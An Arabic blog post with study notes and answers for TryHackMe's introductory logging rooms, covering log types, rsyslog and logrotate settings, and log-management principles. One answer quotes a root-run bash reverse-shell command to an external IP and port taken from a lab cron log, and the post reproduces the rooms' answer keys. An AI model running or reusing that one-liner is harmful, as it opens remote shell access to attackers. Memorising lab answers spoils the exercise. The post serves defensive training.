لقد قمنا بتغطية مقدمة للتسجيل حيث ناقشنا منطق إنشاء السجلات وسبب إنشاء السجلات. يتم إنشاء السجلات وإنشائها لتتبع الأداء وتحليل الحوادث الأمنية وإنشاء نمط يمكن من خلاله التنبؤ بالأحداث المستقبلية. يمكن أن تكون السجلات سجلات النظام، وسجلات التطبيقات، وسجلات الأمان، وسجلات التدقيق، وسجلات الخادم، وسجلات قاعدة البيانات. تبدأ عملية إدارة السجل بجمع السجلات وتخزينها في موقع مركزي وتحليل السجلات ثم تحليلها باستخدام أدوات تحليل السجل وSIEM أيضًا. كان هذا جزءًا من TryHackMe مقدمة إلى السجلات الإرشادات التفصيلية التي تعد جزءًا من مسار TryHackMe SOC المستوى 2.

يغطي هذا المنشور أيضًا الإجابات الخاصة بـ عمليات سجل TryHackMe غرفة.

ملاحظات دراسة OSCP

الدورة العملية الكاملة لاختبار اختراق تطبيقات الويب

يسلط الضوء

ملفات السجل هي سجلات للأحداث الملتزمة بملف بتنسيق قائمة. ويمكن أن تتضمن جميع أنواع المعلومات حول الأحداث التي حدثت في وقت معين. يقوم كل جهاز على الشبكة بإنشاء ملفات سجل، مما يمنحك تاريخًا لما يحدث.
تحتوي السجلات عادةً على خمس مناطق رأسية. هم:

  • الطابع الزمني – وقت الحدث. 
  • مستوى السجل - مدى خطورة أو أهمية الحدث.
  • اسم المستخدم - من تسبب في الحدث.
  • الخدمة أو التطبيق – ما سبب الحدث.
  • وصف الحدث – ما حدث.

أنواع ملفات السجل

  • سجل الأحداث – يسجل معلومات حول استخدام حركة مرور الشبكة ويتتبع محاولات تسجيل الدخول وأحداث التطبيق ومحاولات كلمة المرور الفاشلة.
  • سجل النظام (أو سجل النظام) - يسجل أحداث نظام التشغيل، بما في ذلك رسائل بدء التشغيل وتغييرات النظام وعمليات إيقاف التشغيل والأخطاء والتحذيرات.
  • سجل الخادم - يحتوي على سجل للأنشطة في مستند نصي يتعلق بخادم معين خلال فترة زمنية محددة.
  • تغيير السجل – يسرد التغييرات التي تم إجراؤها على تطبيق أو ملف.
  • سجل التوفر – يتتبع وقت التشغيل والتوافر وأداء النظام.
  • سجل التفويض والوصول - يسرد من يصل إلى التطبيقات أو الملفات.
  • سجل الموارد - يوفر معلومات حول مشكلات الاتصال وأي مشكلات تتعلق بالسعة.
  • سجلات التطبيق رسائل حول تطبيقات محددة، بما في ذلك الحالة والأخطاء والتحذيرات وما إلى ذلك.
  • سجلات التدقيق الأنشطة المتعلقة بالإجراءات التشغيلية الحاسمة للامتثال التنظيمي.
  • سجلات الأمان الأحداث الأمنية مثل تسجيلات الدخول، وتغييرات الأذونات، ونشاط جدار الحماية، وما إلى ذلك.
  • سجلات الشبكة حركة مرور الشبكة والاتصالات والأحداث الأخرى المتعلقة بالشبكة.
  • سجلات قاعدة البيانات الأنشطة داخل نظام قاعدة البيانات، مثل الاستعلامات والتحديثات.
  • سجلات خادم الويب الطلبات التي تتم معالجتها بواسطة خادم الويب، بما في ذلك عناوين URL ورموز الاستجابة وما إلى ذلك.

إجابات الغرفة | TryHackMe مقدمة إلى السجلات

ما اسم زميلك الذي ترك ملاحظة على سطح مكتبك؟

بيري

ما هو المسار الكامل لملف السجل المقترح للتحقيق الأولي؟

T1566/var/log/gitlab/nginx/access.logT1566

استنادًا إلى قائمة أنواع السجل في هذه المهمة، ما نوع السجل الذي يستخدمه ملف السجل المحدد في الملاحظة من المهمة 2؟

سجل خادم الويب

استنادًا إلى قائمة تنسيقات السجل في هذه المهمة، ما تنسيق السجل الذي يستخدمه ملف السجل المحدد في الملاحظة من المهمة 2؟

مجموع

بعد تكوين rsyslog لـ sshd، ما اسم المستخدم الذي يظهر بشكل متكرر في سجلات sshd على /var/log/websrv-02/rsyslog_sshd.log، مما يشير إلى محاولات تسجيل الدخول الفاشلة أو التأثير الغاشم؟

ستانسيمون

ما هو عنوان IP الخاص بـ SIEM-02 استنادًا إلى ملف تكوين rsyslog /etc/rsyslog.d/99-websrv-02-cron.conf، والذي يُستخدم لمراقبة رسائل cron؟

10.10.10.101

استنادًا إلى السجلات التي تم إنشاؤها في /var/log/websrv-02/rsyslog_cron.log، ما الأمر الذي يتم تنفيذه بواسطة المستخدم الجذر؟

/bin/bash -c "/bin/bash -i >& /dev/tcp/34.253.159.159/9999 0>&1"

استنادًا إلى تكوين السجل /etc/logrotate.d/99-websrv-02_cron.conf، ما عدد إصدارات نسخ ملفات السجل المضغوطة القديمة التي سيتم الاحتفاظ بها؟

24

بناءً على تكوين السجل /etc/logrotate.d/99-websrv-02_cron.conf، ما هو تردد دوران السجل؟

ساعيا

عند الوصول إلى عنوان URL لعارض السجل لملفات السجل الأولية غير المحللة، ما الخطأ الذي يظهره "/var/log/websrv-02/rsyslog_cron.log" عند تحديد عوامل التصفية المختلفة؟

لا يوجد حقل التاريخ

ما هي عملية توحيد البيانات التي تم تحليلها إلى تنسيق أكثر سهولة في القراءة والاستعلام؟

تطبيع

ما هي عملية دمج السجلات المقيسة لتعزيز تحليل الأنشطة المتعلقة بعنوان IP محدد؟

التخصيب

إجابات الغرفة | عمليات سجل TryHackMe

أي من أغراض السجل المحددة سيكون مناسبًا لقياس تكلفة استخدام الخدمة؟

التشغيل

أي من أغراض السجل المحددة سيكون مناسبًا لفحص سجلات التطبيق من أجل التحسين والاستقرار؟ 

تصحيح

أنت مستشار تعمل في شركة ناشئة متنامية. باعتبارك مستشارًا، فقد شاركت في جلسة تخطيط تكوين السجل. تعمل الشركة التي تعمل بها على الالتزام بمعالجة معلومات الدفع. تتم مناقشة مجموعة الأسئلة المحددة.

ما هي إجابة السؤال الذي يمكن أن يكون "بقدر ما هو مذكور في متطلبات PCI DSS."؟

كم تحتاج للتسجيل

تستمر الجلسة، ويحتاج زملائك في الفريق إلى مساعدتك؛ سوف يتفاوضون لتسجيل الميزانية وتفاصيل العملية. كمستشار، يجب أن تذكرهم بنقطة حيوية:

ما هي المتطلبات غير القابلة للتفاوض؟

المتطلبات التشغيلية والأمنية

يعمل فريقك على وضع سياسات لتحديد السجلات التي سيتم تخزينها والجزء الذي سيكون متاحًا للتحليل.
أي من مبادئ التسجيل المحددة سيتم تنفيذها وتحسينها؟

الأرشفة وإمكانية الوصول

قام فريقك بتنفيذ منتج جديد لتسجيل واجهة برمجة التطبيقات (API). تم تكليف أحد أعضاء الفريق بجمع السجلات التي تم إنشاؤها بواسطة هذا المنتج الجديد. أبلغ عضو الفريق عن أخطاء مستمرة عند نقل السجلات إلى منصة المراجعة.
في هذه الحالة، أي من الصعوبات المذكورة يحدث؟

العملية والأرشيف

باعتبارك مستشارًا، فأنت تقوم بإجراء تقييم شامل للمخاطر ولاحظت أن أحد فرق التطوير قام بتنفيذ برنامج نصي مخصص لإنشاء سجلات لنظام قديم، والذي يحذف عمليات التسجيل في بعض المراحل.

ماذا تسمي هذا؟ (خطأ أم ممارسة؟)

خطأ

تجول الفيديو

, ,
عرض التعليقات

معتصم

عن المؤلف

أقوم بإنشاء ملاحظات حول الأمن السيبراني وملاحظات التسويق الرقمي والدورات التدريبية عبر الإنترنت. أقدم أيضًا استشارات التسويق الرقمي بما في ذلك، على سبيل المثال لا الحصر، تحسين محركات البحث وإعلانات Google وMeta وإدارة CRM.

عرض المقالات